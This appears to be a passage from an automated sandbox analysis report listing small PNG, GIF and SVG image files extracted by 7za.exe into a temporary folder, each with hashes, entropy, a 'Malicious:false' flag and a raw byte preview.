      SHA-512:C4E7CDB3B4CB306A7E2126514BB181960404F5D2CD88B51EC10D6029D53A334BAC80F2D29A08E38D96E725085EE845D2E6D28F81B037A02A54CAD2E16EB18EDC
      Malicious:false
      Reputation:low
      Preview:<?xml version="1.0" encoding="utf-8"?>.. Generator: Adobe Illustrator 16.0.0, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->..<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">..<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"... width="17px" height="10px" viewBox="0 0 17 10" enable-background="new 0 0 17 10" xml:space="preserve">..<path fill="#1796E3" d="M8.457,3.086c0.974,0,1.767,0.807,1.767,1.794c0,0.991-0.793,1.795-1.767,1.795...c-0.975,0-1.767-0.805-1.767-1.795C6.69,3.893,7.482,3.086,8.457,3.086 M8.457,2.122c-1.506,0-2.731,1.238-2.731,2.759...c0,1.522,1.226,2.76,2.731,2.76s2.731-1.238,2.731-2.76C11.188,3.36,9.963,2.122,8.457,2.122"/>..<path fill="#1796E3" d="M8.505,1.084c0.457,0,0.916,0.05,1.365,0.147c1.332,0.29,2.713,1.014,4.103,2.147...c0.682,0.556,1.186,1.041,1.587,1.53l0.03,0.034c0.008,0.009,0.016,0.021,0.019,0.037l-0.004,0.056...c-0.004,0.009-
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 61 x 61, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):1330
      Entropy (8bit):7.759117122984435
      Encrypted:false
      SSDEEP:
      MD5:A6895685460D14095CF7CD8C2EE9CC30
      SHA1:BEB8B55956EF44FF4DB2AF523963BAF4040F6D6A
      SHA-256:97388264A66537063F86EF43484F4E2D813F4AE62BB7D4AB734E56C14114A826
      SHA-512:1257F1ECC5BC75B47DEB8A9BBB2D9CD05CE010D2A79BD968604ED3D268CE5CCCA46BF252380062D9635C6E134E5D4EDBD5E53168817C68037E75BA2679DAC6A6
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...=...=......ba.....pHYs...%...%.IR$.....IDATh...Q.@..?4.C.8............T.]A.Y....s.E......p...s.B...je+Cv.3.X.....{..:{yy.g..>........0..*.....%.].&..\..d=........S..6.6Y..z.=YO.....t..-.E.&.....<.|;k..d..{..;.X.....\#+..z:...8?..<...0......4...r......,L..uF....._..#......rN.+.>...5......\d..z...%..R.gK..I.u7.k]...wY..Z..z....0..$w..t....=..U.&.6d1bPU.mXa~.."..Gea2.iM....,.......7...b......5.VB.Lt.!X.C.&... .J......-.....8...$....0[..j.so...M\.D.9c.....)..F......4....*-...^.M..^V.u..+..`_..*n...._......F.w=...tYI."j...2..@.'..5)n.[..A....'.RB_5).).2A.j..Fi2\c....ilN..4....M.w..GLx.#.JQ.L.._h.:QM,..[...z.....uA....r.YO..X..o.......].z.uE)..-.,.u.o:.....2...x...:L.d..kn.%%.&...D...O-)C+.K.'.iJ@...........Z...@........9K.t....+.!.....J9U.M.....#.w......Q..U..c.~$..1...s.x@"7...[...o n)....{M...Lp....&..d....CS@X.8......qO.`4}9.....$.!p.=0..<M.i.*2..q..,6i.x..I$QqEJ.....j.].Se6T4AJ%4.e..1H.<P......P..$'..~k...b....,.....g...J/
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 61 x 61, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):586
      Entropy (8bit):7.40134657178601
      Encrypted:false
      SSDEEP:
      MD5:4A0FA84D927420F441ED065F15FB7482
      SHA1:5BCED8C34F78C6F7D5D5CD9C8475157E8FB73333
      SHA-256:E7B01C7E196441BE9B54B92F095F6DCCD428A2A9F094EE31983EA2A56C20C07E
      SHA-512:3E992A60583CAEF4805948F439D9684D4CA69371373F6DB8F13AB2B084F12FE135326C4BE8F3D611A8A48523511E41538043F402D99C9A728C02DBC7C32C0178
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...=...=......ba.....pHYs...%...%.IR$.....IDATh....q.0...oM... .t.G..A(!%P...:H.p|..p...r.!.$..wW.:y4..d.Z..|>....6C...6...I{...M....W..;.g....b..5...~....<u...!.C!p..yL]...%.....F:Y...m........~..O...._...8.}.._.~.|-.I.....0...YZv.......77"x.b\..N...5G..<*9.K.Ggd.p).4T.....{K...,..N...m.......-..5....1pmpvF...mU..:..m.(...6....q.....#.`..}1.{Be.#....)...RN.Q.qJ.7..UJO."...U.V....=.KObh*8..QscG.5*0..1.RpW.\..j.k.]-`M.....w..5.F.4......s...,U..|L.3........d.....F.%.D.......7.t3.../.lB.G.l...4.G.[........6...mhC...n.{._..g....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 130 x 160, 8-bit colormap, non-interlaced
      Category:dropped
      Size (bytes):1633
      Entropy (8bit):7.702434393080376
      Encrypted:false
      SSDEEP:
      MD5:D2643930735537BD7ADF4BEE6D32A933
      SHA1:521EBBC6EC7BB41B4F939C632C2D7B55137AB4F7
      SHA-256:93ED479B716E1097FC1C67489149DBA132D056EB039A7509AE7C06C7CC3A965D
      SHA-512:D8E69B6C23A8E22F201A51D08FA415CC6D1F5EB900730853CD4B031A795042772B66FED39A2F3B4DD55DD5F8B3BF6306B3FC81F06F1FE6718DC5860CD2E8F481
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...............D....*PLTE.................................................tRNS......................IDATx....(...@B......575kO".U..jS.g.m.....y...r`wG..v..!0.G...........2. ..Q..*8......2.@..S..` .....~..i.I.$D..2...@.?.....Vg.'....X.-.\MXa.IL..6t)A.P.)j...w.>?..".G.....\@...`.QN.x.p.W......$P.q.-.I..#..*....h9..Z.0"..~..j.1.0..).0.V.m..=....s....=.......!..3..I...JK.G..^...".....1.@........E.. .EHn....5(D.!@7r5.h..0.-N+W....r.?...K~....k.h..5v.l.~.\...b..f.h:q.....)l....t<.&/..Y._.3..+E6.._.~7..?'.O..a0...n.q.@..#..!......4..#.i5..p.JeCH}.5.p<.lv.o.`.....#\.9..+3.CH...h...s.......$A.7..>O.Y.z....?&...p...'._.LB.Kx;..G..y.<DX.' .[..}.=O.g...E.%A/..z'!*...>.Ay..}.IS...$.q.S./_.'..H.x3!..M....."D.x/a...;..y..t.#.... 4c.|cZx..j...s.=&...vI.~..|....0O.....P.]..E......{."..L3...9./...Uo..._BHz2-3.....U7.M.$#.oB.:...'..r....~._.z.l....P...ou......?.bR/.{5"?.2....&..y.%.a+..A...lRO......h.....o.{...[5.......x%..~ho.f$1..v..o@.z.1 K..
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:GIF image data, version 89a, 24 x 24
      Category:dropped
      Size (bytes):5751
      Entropy (8bit):6.517955370672858
      Encrypted:false
      SSDEEP:
      MD5:FC4F8C002AE903FC405400A87440DE57
      SHA1:2064C7B8D89E6877431271FA650A4030C287267E
      SHA-256:08EF257C33D5CE5A072E368B3E07551023102B6BBA77AAADB03BEEEA19D244ED
      SHA-512:8A53802BD9623E1624B33B98996510D61737696BDE1871BD98BBEE0BEBA0F098B5FC392B52E51BE20939CDBBE736FBA837688AF60E01050630A7C65E237220C6
      Malicious:false
      Reputation:low
      Preview:GIF89a.......................................................................................................................................................................................................!.......!..NETSCAPE2.0.....!..Resized with ezgif.com.,..........y@.p(.8.....!:. .bAxh8...Q.<......P....x..h.3......?.. B..~k.B...N......_.....O.....N.....D...N...C...C...B..........A.!.......,..........................................................................................................................................................................................................x@.p(.H...b.!:....!.x8..c.y.-.....l1.H"B&2.l...i;9..0.h... B...^.h....O..."M.O...O...O...O...w..C...C...B..j..].......BA.!.......,..........................................................................................................................................................................................................x@.p.0.,...P...O..!`x@....!A......t,..w.......Y....b..........
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:GIF image data, version 89a, 30 x 30
      Category:dropped
      Size (bytes):22370
      Entropy (8bit):7.208413671079572
      Encrypted:false
      SSDEEP:
      MD5:082A4F3F6D86E57AFAA05B5315F96EA3
      SHA1:7F22AE51BED38009ED27807BDA343F4639584579
      SHA-256:FAD7B8740B5FE14C3BE4B7D6CD1255892F62A8C4C4F8663BF3BD12847BF71FFD
      SHA-512:8CF86937E7E825BA7ACFD3789F9C61EAC24D11200DDFBCF28FA1B06A4FE4F035990A013BE7BABF04C8942FE724CBCEA69505A754768B2875DFA993FAA482A35B
      Malicious:false
      Reputation:low
      Preview:GIF89a....................................................................................................... !!!"""###$$$%%%&&&'''((()))***+++,,,---...///000111222333444555666777888999:::;;;<<<===>>>???@@@AAABBBCCCDDDEEEFFFGGGHHHIIIJJJKKKLLLMMMNNNOOOPPPQQQRRRSSSTTTUUUVVVWWWXXXYYYZZZ[[[\\\]]]^^^___```aaabbbcccdddeeefffggghhhiiijjjkkklllmmmnnnooopppqqqrrrssstttuuuvvvwwwxxxyyyzzz{{{|||}}}~~~...................................................................................................................................................................................................................................................................................................................................................................................................!..NETSCAPE2.0.....!.......,...............H...Y.4).e.......CFJS.Y..i.....s.!B..YHh.C9.)0.&T.X...JS0......fD.&wBl.&.B#.\..\(TIY.".._OrQCV;*...,g...M.S...B+..-.P.f}u.Q.\.?.".K.'_.m.>d+.....5.C,.YL.#K.L.......!....
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):2511
      Entropy (8bit):7.904118249117074
      Encrypted:false
      SSDEEP:
      MD5:33DDC7F529563C10320F2F3743A62D9D
      SHA1:1CA6082D4B54A3E06226BA1A47FB9EF397A42F55
      SHA-256:610F8F16AD537BBD378367CA75B0D2B7C5AE83374068AF5C7658E487087826D1
      SHA-512:720D98B4920D35987CC0DFB03F64992C8872D5BED78E30CA01C367E6BB792D542359910083026CA8D0FDB73E7A2247CB6A38A444EFC3FA87A41B95A856059008
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...(...(........m....sRGB.........IDATX......U......+.(...ES..A.#..h$... .F... .XY.i.hE..~M. .|7aN.i.2Z.....c6..........{........o..;...{...{..5..Zc..Z.ru.HJ...H....+Yk.h...8..4..i......1y....]qVy#y.}...AR..Sm.{V...9.....VV`.'#.=A#.(L.WZ/."....%...pO..."......Y.....#..o...4....I..x^$.t\.:.Twu...M@v.....M.yx`.,.nL............0. '..%...~..1.J),..jm.tF.....k....=.r.4{.9.q.O.1..0?.v%......Y<...+9...k.[.V~..CT.#.......RzJ.H.-.yYVT..iQ......w...bS...........[.. >..t*.[..FNb...O.T..&K.>....a..m.q;..|.....8..Gb...b........M.bf..>......v.3....e....c...~....|...O............9+{..J.....Ah.J....ZD.c......\,).Tc....O..J....U...d.E.....).Xam....iM....-tp.Oc..G.. ..A&.1.q.,....P.2........l.|.....l..r.V.......A...........{..7..8......S......Lee..........i.z..tW...0..g..>...U...oAY..,.;=..L.h+V.g.KF.&!u..?DqQ.1k..61qx.0~Q:e...i.j ..?......<H....X{...PTPa.O..[.....o.;...xm8.k....G{.....1...J.a..p..O0|Z..rG.6.....2Q......2I._ ...5wE.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 144 x 144, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):7081
      Entropy (8bit):7.963251818658938
      Encrypted:false
      SSDEEP:
      MD5:7BB5616A91B00D669CA2A97D7634083E
      SHA1:23A148723054717554FD6E9D56BA24121783C668
      SHA-256:A9EF20AA139D39139399EFC2CEA7FB6D5B60937B4A163C6E07F1FABC85D0B294
      SHA-512:A6EE62FE45FF0AFE739B54A02DC23D86B4A6AC39C753F34E47D8B3166BB1C5B6076FC6499F77E29BC79B33FB2B00A9F40A82DE0A6D840606720169906EAD66BD
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR..............F.....sRGB........cIDATx.......ivY.DP6.v.:*cT.F...D.+..g..L4..k.`.&3f&#.W.8......Q......n.. ..(`.=...^.....U.z..y.}...].=....{.VU.`.;...o...7n<...d@uuu..m.C[..W......x....\.....o.~5...w./_.......N.}.RR.kYQQ.z.....a.cPr.0.7g...].....*.w.[[.lY.....^...@.-k.}.c...h.x.x4.....n...<...^.y......<.V|.....B...\.....I'.B...d..s6..<...!..7...VR..M.<......q.L......1Q..D ..x...:)>nG.,..../E..8..M.6~.....8.G:u...[.(...@....Q......Q..../{..{.........~.$#. ,.a...j.c.X.......O...X...@'......(,...tj.I.C.Jm.`.z..i....Q...).|...6mz.....D.........~;.[.n.#.O...(.......^.s@T..E>....h"....W]h.....>.l...4.1...Y..h.:.....9.....L.<.-.....Iv..d.B...b..u...<.)..@..y.4k....7Z.oa..@t.GS.YE_'XU.7..t._....Z...g7...8/......y=..w.P...$S.V2...%..X ...OQ..n*.p..k....3$...kw>"_W7y.i..X..}.......:..@...g*.7[e..*,.T|ajZ&..c....a....X."..1..:k..... ...6.....&.5....N.c..sA...{...........P.q(.y........|.yE.....>.K6.K..Y...}i......s
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 15 x 14, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):317
      Entropy (8bit):7.052430696760691
      Encrypted:false
      SSDEEP:
      MD5:170CFDF359C487A520C2D4B30F37E777
      SHA1:4B0D6EBFBBAD84AB5D6668A4331A4801B628C6D0
      SHA-256:E816DCC50549222EB6E5DFB3E14447E5649F32B512085EC3EFC5F51DB07EC86A
      SHA-512:90685C826F06C88D02523ACF18A93F2B4F931085078CD9B47C2FB18222D82A95E0F554A8BAAA91D3FD467FF7F8CA9DD3596FE7BC55248022B2F6F1D233615489
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...............F.....sRGB.........IDAT(..S...0.$|....@|..(..(!.h...X..0>./v`.....e.N.......q..`.m{.n....j......1.B./..I..._s.:.l;....Q.....D...J8.L.... ./.#......4UZl.M.\.z6.J..+!$.`&&..Q.W..O9fY..|.0..i.1..Yo!...!.".Q...)8.a!..3.J.$..a.Zo....S.@....^{..L./.>OI..#.W./\.Q...J.....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 10 x 10, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):219
      Entropy (8bit):6.516611360722246
      Encrypted:false
      SSDEEP:
      MD5:F7EA13084CB0E706C19CA45DE8426E6C
      SHA1:773A2428D6705661F0FA7178DBA01F163F45CF6D
      SHA-256:A698A8E5F339FA422A85B07AE1484E53BD86B132B1AEA907E75D47D029C487B8
      SHA-512:4589568CF76912B324EA78F815A510410525771FD9397B2B027AB78CE54EE40CB8A09AC238699468BD899E2B4105C1FDBFCBA6AE602DA7DCB25A991F52CF1953
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR..............2.....pHYs...........~.....IDAT..}.a..1........H*......I..X8...W.'......A.%....D..4J.>....t...W..g`_.{..$].xd;.`...A...3.....ef9ED.o..=ef.7s.jW...x..2..h.}..._..Y.V.........IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 15 x 14, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):300
      Entropy (8bit):6.870899753768882
      Encrypted:false
      SSDEEP:
      MD5:171050DFBDB05A502281C9366104143F
      SHA1:3DB64FC269D1433E13E096A26B05EC204433E6C4
      SHA-256:91F98DDD4178FFD535B52DF8011D627E92EB6698903ED20428F072AA7DF47CED
      SHA-512:565457E31E9DAEB5F74CD4B8D6681D639FF0A419AD9FB9F38D471928E02DAC26259525659282C11385D5F23EB1F4F61D3326E8DEC1A0B6C827F0002C94BCE34C
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...............F.....sRGB.........IDAT(..Q...0.t..l@6 -..)a....0#..#d...l.:J..<%..'.t..t..c<z..)...,Rq.pP}.g...r..H3f.PsW...`>....j.....FwC.J.o.......$..Z@.....fQ...g.... .F....g.Rp..;.....Nj6g..(Q.H.D..`...(..WHyi..%..b..'....Cz..r.IF.q;.i....q....6..\.....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 11 x 10, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):235
      Entropy (8bit):6.629455183316377
      Encrypted:false
      SSDEEP:
      MD5:7E289A0B5744DACBA51E0F34C1764C76
      SHA1:F5392F711A14AB843DD9327418AA40D21CF6E8D8
      SHA-256:D773BD8E2FF0EDD022510927F2F2765646E328F3D90F084CA5126549425050A5
      SHA-512:47875C2183386CB8F073A0C188FC644F99DF9274B0A3EE005C2ADD5151FB472DC59C842B90D632F2AD17CB000F35E8504669BF2461A43A5490DB175FDB5E6110
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.............b.....pHYs...........~.....IDAT..u....0.E..=+d.<.#....f.2.....&.6.......e..K...'..af.OU;U.......B.}...,......~./"S.U...`...]D......6)w"2.....1.-("/....wy.V.<_....x...Xi...O.<3..D?(G$.....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 37 x 70, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):1724
      Entropy (8bit):7.84697312400813
      Encrypted:false
      SSDEEP:
      MD5:E1A705761DA081FD6D6C8DAD4D991DA9
      SHA1:72E6F3E576472A304AD8C30AF530F668CBEC982F
      SHA-256:30E7A27E1389697263579B7C2A0AE2CE026EEBFD91BC69F764D38CC0FBA37135
      SHA-512:515707C7FCC24332645AD02EE2E2DF1D2CC8B20026246D09F3E2651C8FF0F21B5CB6BA291182CFF6AEC22B26FCA0C71B721B921EF387365F92770CBE4BA13596
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...%...F.....K.].....sRGB........vIDATh..klTE.....R.Z.VQ.4U[..m..DS5.....D.`..C.DMI.`.UH0.hP|......6V.+....nc......P.....?wwf.n....M.y..gf..YF.>..k..h%....i)1*..9..0g.r0:>.f_.B25....aZ.%m.hD.B8?.N.h.3U..m..q.Gw..L......d.J../...........'...d...$.j...}g`.IXGC.`...v....e.yi. ^..KM`F...^....&..I.....0fV.....8.D.4...9..oa'...&g..9g.^.1..E%R...D..ph..,2-....j.....>..{.2..i..Q....V..2..aVPn/_>...(.F)d...J.P3..#Z..u N}.o...B..'....R...........7.....P.C.2>I.....U3....of_..%&-e..u....S+..ZJ.....S....)L.u....UR..~..@[UEN...!..M.T..Wau?....h.<....1.6.%L.h7*.@p.?..Q..3.......v..f.:...e....(?.Jl.(L...\..X.Fd.0.*...1...*?U.Q.U F=.j5.N...e!V....2me...}..[....ci..V..u)(t.S.@.7s..)9...P.G....t.X.4'.5Kyyi.C....%.S.`.;..6Dt(|]((8..l..S.C!.f....e.Pk...0...f].r....#.j..5..B.j6eH...X..f|........R?......ox...U.P.QP.b.....B.8,.#...q...?.....2..3.0....T.P8ySP...i!..G.1(d..........R....V..~....2F5u.....th}.l........c{.T..Y..(..o....52nW.q..(8.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 140 x 136, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):2349
      Entropy (8bit):7.788596654341375
      Encrypted:false
      SSDEEP:
      MD5:5184538A80A49BF168C2253ED706284D
      SHA1:11FD5F0ED93A1B93D71DDB46654BBE29226C27FC
      SHA-256:705BCB5B507CB2958FBB44274BF44C63E2566A28A9CEFA9504517D8013C2FC2E
      SHA-512:1EE8826E38108253C209DD8B982995EFD2530FCE11C1D6210868B221C7749C66EAD96B5DC1C9DA2FD8011CE10F11CDD2696BC4D4C8B702FC1AF1F2BFF738CB86
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.............5Q.(....sRGB.........IDATx....E..y...d'&`..E..2........#D...$$$&......(......;V.N..#1D...$... ....mh:}..[..v...s{:]u.;'..U.}..R.........#H.z....P.."....?s.MO.%........ez/.5.O...X.......l1$XN.H.c..vOl...z.U]....GFja....X.Z....h.;....\'`.3.35....7..KR....*D7.......................t#.:..#. ....F..E...)H..v.i.2.N=.w.<._...j;.u...1.w..L.mkU.n. 8.B.E....Z.......D.D.+bjZ.;...Z.w....I,..r.9..Rszq.......Y^GF#..g(|....e..1.JU'@..N. Y6.5.TuVY.W....YA..VwIl[.1.U..7....j..>..P..y..$.V....G........@.U.N......?JK_...N....#@P...-...XUU......d."hl.... X6'.&z.+....b..d<R.~..../.g.!Q......1...`d...-....g.3p.8$.".6l...a.F._$-m..Qg.'.g^B.Q{j..=2...H.`.P.?...,.ZU....F@.h.^.F.U...F.7l"<....>.t.X...}.U......j.6.....F.L. .V"....-..%...I.+....D...3f.C.!W..t..Q..s>.2,X.t..D).G.o,B.G^qX.Egl~.].2...24.r....8d.b.U..g.......)Fi...?s=.3."..8....x0W.b.S..C..T.Z...1..=.!.v.....r(oo.1{..Ae]w..8..DpM.Q|.Hx.7..q...e.......(N....F...,.1..,.4.ze.y
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:GIF image data, version 89a, 30 x 30
      Category:dropped
      Size (bytes):5287
      Entropy (8bit):7.000212095320542
      Encrypted:false
      SSDEEP:
      MD5:80138A75B747A2856F261EC813DA5CD8
      SHA1:910883DE0972F1B360B6F0553FD428D09DA4B4E6
      SHA-256:13EFDD31D3DCCD7F324B931D2CD436B6DEA5B87EF59E80566EF5090D1AC41922
      SHA-512:6B2F53D8D1B9B26D10976496B1BE727FF090F58B994D252209719F558A253DBA19D79FD6FA04AC7D7539CC295F901F295E4CBADBDC68A9127A3585FF05B8D650
      Malicious:false
      Reputation:low
      Preview:GIF89a.........D|.....l.......T........L...........T.....C.............................................!..NETSCAPE2.0.....!.......,..........< $.d.<KQ,..p...R ua.|.....w.....r.l:..tJ.Z..v..z..xL...!.!.......,...........D|.<.t,.d.....L..L..\.......Ll....D..4.l.....T.....l....C..................................T %.."..$O...).T.....;......{4.....I.....88.B.!......h.....z.n...|N.....~......y!.!.......,...........Dd....4.l....T|.T.|.....Lt...D.t...,.d..l..<.l...$.\|.\....L....C......................n &.c2@..4....).U.H.#..\..m......P1Hx.Bd(.@t...0..(;..k.-..c.3.I..#..=.... ...~...........................!.!.......,...........D\....4.dt.L.|..,.dl..T....Ld....<.l|.T.|\....4.lt.L.|....L..C...........................%.#0..c.....)..DU...c.F.Pa!....1,F.@. @4L.1..... Ym."8DG.A....r..YA Bd.b.<.Lr.#.8..|4..,?..Ef.4.D."....Q..r........................!.!.......,...........DL.|,.dt...T....Td....L<.t....L\......DT.|4.d|.$.\l..D.t....C........................
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:GIF image data, version 89a, 26 x 26
      Category:dropped
      Size (bytes):4236
      Entropy (8bit):6.919834263786595
      Encrypted:false
      SSDEEP:
      MD5:01B1F61B289E007B74F10C9C848CB520
      SHA1:A1CACE6605BE9A94430ABA64746339A93CF88591
      SHA-256:A8DC0E295AE5EEE1C407AA264B499655332CDCFD95FAF1898979C67A9E285D25
      SHA-512:9A3FCDD6D70B33286A352BD060BCA7266815B5A7CCAE3A3D77FD0D89034D81AB1530F4F2EF88AF398834097FBFFC3C2FFF44F24E8D15FFB37CF62211949C7C74
      Malicious:false
      Reputation:low
      Preview:GIF89a.......4.......l.......L........<...................!..NETSCAPE2.0.....!.......,..........0..9.0).A.......`:...,B..tm.x..|....pH,...r.E..!.......,.........L....|.....d....\........T....L..........t..................................................E.$.b.......0|<@..5..1,.F 2p...........Q`8..v..z..xL....z.n...l..!.......,.........\..............l..............d...........l...................................................Y.$.....<.3.0|.......GLF..B..4....@D|.Z..4..B"...z....P...W..Ql..|N.....~...........1!.!.......,.........t.....................|...........t............................................................g.$...... N .0..@m.....R3....D....+....nR...L..A.......C..$Ax1z.hYM7.@.;.......~...................!.!.......,.........................................................................................................z`$."....8C..0,.@m....Q+.............hK...8$.R.......9..t^."y....4.D...o.a(.y$.I&...;..'...1.b....%.q................!.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 79 x 85, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):3848
      Entropy (8bit):7.906788053722432
      Encrypted:false
      SSDEEP:
      MD5:1CD7001CB113E183758C8BB44941B6E6
      SHA1:765927473207F314F391D046BA55C97C80B3B9F5
      SHA-256:A59D24C8960CE47280EAE5358CEB52F646632F3BE6372740B44E2F823B67BC4C
      SHA-512:3C55A466C8C93C2A167526B2696A706818961A3D6104BCFAE9A3264CCD776365867B60523F4AB1A13E803BA496037A520845F78D2C6FBDC9E42D78307F4225BF
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...O...U......y.{....sRGB........8eXIfMM.*.......i...........................O...........U......K....~IDATx..\i....~..s.5.^...Z.......>.XB1H\.#.P.8..@.(.lB8.H.J."D...v0.2.1..p.#6..6..s}.k.gwfgz...{......sw=hK....W.^}.....`8.#0..0....#0..0....#0.....H.b./].-....\..jg2.{x.._.M.,*. ..3.h..}.......|a.E......j.........A.... .0YD>&.<.'...3..;=(...<..........`$....gO..=..?.]..E2.P.....I.3./|t..5..}..t.]D9.P.w..4.^..G.Af..a..V.W.|...\..h.?.$1-.x.$..)%.G.....".Na..i..$.o..47.o..1Y.v.../...0... .....T...7.^.......^..[.s...{.........hV......lO.t..=T.<....j....1}\?... ..^..W...w..^...}.B......T.d.%...1.)s.(0&.J..B..^x.XG(.7(..L..J.o.......g..X....$.4&..^_..c m|{.d/./..^... .".......{..K...q8......<U.8.C.9.L..vO....0.3._..w4..;....j.[??c.......&-{...f.[....7...!.C....'.2.&..z.w..u....%i..v}.3iS5.G@)...aB(.m......x....X....V)!.....q..B......D..+^.......R..4.XBu4.S..|.-g;2KL.......\..Klk...r.s..Ut..Z.......3.ht.x....M7IC8..K...&.3K|.....]$..q..+.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 17 x 10, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):2979
      Entropy (8bit):7.910835301039568
      Encrypted:false
      SSDEEP:
      MD5:B1828BEF3606E931EC3181AA42C35A5A
      SHA1:E4D389AFAA40B6E5175B0516D8AE4C7D33E086BB
      SHA-256:EE1FF17F0F0C7C190F17CA0B46F25DD067C8185AED223A71FBA0C1B59ECC33AA
      SHA-512:F2991381700391961213CD0AE6C4C652C5E0069E3C3882B2BDE325B487CCB6D61A8DE45CEDB0A896C590F2788C6D539FE464C50F9AFE82FF1D5D32A72BD234AA
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.............R|.....AiCCPICC Profile..H...wTS....7..." %..z. .;H..Q.I.P...&vD.F..)VdT..G."cE....b....P..QDE..k..5....Y.....g.}..P....tX..4.X....\..........X...ff.G.D....=...H.....d..,.P&s...."7C$...E.6<~&....S...2.....)2.12....."..l...+...&..Y...4...P.%...\.%.g.|.e.TI....(....L.0.._..&.l.2E.........9.r...9h..x.g...Ib...i...f..S.b1+..M.xL.....0...o.E.%Ym.h.....Y..h.....~S.=.z.U.&..A..Y.l./....$Z.....U..m.@..O. .........l^....'....ls..k.+.7...o..9.....V;..?.#I.3eE..KD......d......9i...,......UQ....h..<.X..d.......6'..~.k.hu_.}.9P.I..o=.C#.$n?z.}.[.1...h...s.2z.....\.n.LA"S....dr%.,...l.....t..4..0.,`...3p.. ...H.....H.i@..A>...A1..v.jp..z..N.6p.\.W..p...G@...K0..i......A......B...Z.yCAP8...C....@..&..*...CP=.#t...]..... 4...}.....a......;..G...Dx.......J..>........,._..@....FX...DB.X$..!k."...E.......H.q.....a......Y..bVa.bJ0.c.VL..6f.3....b..X'.?v.6...-.V`.`[.....a.;.......p~..\2n5...........&.x.*.....s.b|!.........'..Z.k..!. $l$T
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 15 x 6, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):224
      Entropy (8bit):6.415460970033393
      Encrypted:false
      SSDEEP:
      MD5:9B148314E780C750A8F1086541DE48AB
      SHA1:ABB43C5860A5818822BBDDDC12B884AC0EFF4C3C
      SHA-256:42FB6D29D67FAF063A74F54246770B28917314AA1ED91AEEEB94CF5E6D8D2C18
      SHA-512:D0C83BF80AE446FABA496CF56E70A0C743C38C10131E39FCECD0FEAEEFCC7490538BF3FC686B695A76E913BFB24A228C4BB1252F3AAC39D1C2375B040E20D593
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR....................sRGB.........IDAT..c<s......022.0........0.......%P`.1z..6.......gD.p..D....1'.8.....(^........h...<yR...y......P.. .033;....L.......".2... >P.A 6D........Y.j.3.E...@>...x....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 17 x 10, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):2982
      Entropy (8bit):7.914375029941816
      Encrypted:false
      SSDEEP:
      MD5:C88C78C9DCF11880A801E44E705F9708
      SHA1:7B98255E87F81C3A655D375F112C188D9BD241A7
      SHA-256:4F2785A950320440ACD22FCC0274944B971D5975DE008F69BF81D19D44842925
      SHA-512:EA1FD00C23C7ABDCDCECFCE5D93B1946763043BC18CB17846AB3ECB607F19A7EDE63CA5308CAE6E2395053B223A4E438111CB6170264CC42C817130BD178FF4E
      Malicious:false
      Reputation:low
